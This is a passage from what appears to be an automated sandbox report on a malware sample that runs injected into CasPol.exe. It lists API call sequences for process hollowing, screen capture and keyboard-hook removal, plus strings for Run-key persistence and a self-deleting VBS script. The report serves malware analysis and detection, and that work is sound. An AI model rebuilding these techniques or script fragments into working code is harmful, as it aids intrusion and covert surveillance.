                                                                                                                        • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                        • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                                        • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                        • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                        • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1663032902-0
                                                                                                                      • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                      • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                                                                                                                      • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                      • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                                        • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                        • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                                        • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                      • EnumSystemLocalesW.KERNEL32(00450E7A,00000001,00000000,?,00443CFC,?,004514A7,00000000,?,?,?), ref: 00450DC4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1084509184-0
                                                                                                                      • Opcode ID: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                                                                                                      • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                                                                                                                      • Opcode Fuzzy Hash: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                                                                                                      • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                                        • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                        • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                                        • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2692324296-0
                                                                                                                      • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                      • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                                                                                                                      • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                      • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                                        • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                        • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                                        • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                      • EnumSystemLocalesW.KERNEL32(004510CA,00000001,?,?,00443CFC,?,0045146B,00443CFC,?,?,?,?,?,00443CFC,?,?), ref: 00450E39
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1084509184-0
                                                                                                                      • Opcode ID: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                                                                                                      • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                                                                                                                      • Opcode Fuzzy Hash: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                                                                                                      • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(-0003D145,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                                                                                                                      • EnumSystemLocalesW.KERNEL32(00447078,00000001,0046DC48,0000000C), ref: 004470F6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1272433827-0
                                                                                                                      • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                                                                                      • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                                                                                                                      • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                                                                                      • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                                        • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                        • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                                        • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                      • EnumSystemLocalesW.KERNEL32(00450C5E,00000001,?,?,?,004514C9,00443CFC,?,?,?,?,?,00443CFC,?,?,?), ref: 00450D3E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1084509184-0
                                                                                                                      • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                                      • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                                                                                                                      • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                                      • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                                                                                                                      APIs
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLocale
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2299586839-0
                                                                                                                      • Opcode ID: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                                                                                                                      • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                      • Opcode Fuzzy Hash: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                                                                                                                      • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                                      • Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
                                                                                                                      • Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 54951025-0
                                                                                                                      • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                                      • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                                      • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                                      • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                                      APIs
                                                                                                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                                                                                                                        • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                                                                                                                      • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                                                                                                                      • DeleteDC.GDI32(?), ref: 0041806D
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00418070
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                                                                                                                      • GetIconInfo.USER32(?,?), ref: 004180DB
                                                                                                                      • DeleteObject.GDI32(?), ref: 0041810A
                                                                                                                      • DeleteObject.GDI32(?), ref: 00418117
                                                                                                                      • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                                                                                                                      • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                                                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                                                                                                                      • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                                                                                                                      • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                                                                                                                      • DeleteDC.GDI32(?), ref: 0041828F
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00418292
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00418295
                                                                                                                      • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00418354
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 0041835B
                                                                                                                      • DeleteDC.GDI32(?), ref: 0041836B
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00418376
                                                                                                                      • DeleteDC.GDI32(?), ref: 004183A8
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 004183AB
                                                                                                                      • DeleteObject.GDI32(?), ref: 004183B1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                                      • String ID: DISPLAY
                                                                                                                      • API String ID: 1765752176-865373369
                                                                                                                      • Opcode ID: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
                                                                                                                      • Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
                                                                                                                      • Opcode Fuzzy Hash: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
                                                                                                                      • Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                      • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                      • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                      • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                      • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                                                                                      • API String ID: 4188446516-108836778
                                                                                                                      • Opcode ID: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                                                                                                                      • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                                                                                                                      • Opcode Fuzzy Hash: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                                                                                                                      • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A
                                                                                                                      APIs
                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                      • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                        • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                        • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                        • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                                                        • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                      • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                        • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                        • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                        • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                      • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                      • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                      • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                        • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                                                                                                                        • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                                                                                                                        • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000), ref: 0041B61C
                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                      • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                        • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                      • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                      • API String ID: 4250697656-2665858469
                                                                                                                      • Opcode ID: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
                                                                                                                      • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                                                                                                                      • Opcode Fuzzy Hash: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
                                                                                                                      • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                        • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                                        • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                        • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                        • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                        • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                                      • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                      • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                      • API String ID: 1861856835-3168347843
                                                                                                                      • Opcode ID: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
                                                                                                                      • Instruction ID: 0897204671ac35a997fd8cee39da091aa0ef4b51e820d3179f4d1f6ac17f39c2
                                                                                                                      • Opcode Fuzzy Hash: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
                                                                                                                      • Instruction Fuzzy Hash: CD9184316042005AC314FB25D852ABF7799AF91318F10453FF98AA31E2EF7CAD49C69E
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                        • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                        • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                        • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                        • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                        • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                      • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                      • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                      • API String ID: 3797177996-1998216422
                                                                                                                      • Opcode ID: 92fe1a40fcd02945d331df6cf61fadf3435f0996d79fe2ddfa73a677218823cf
                                                                                                                      • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
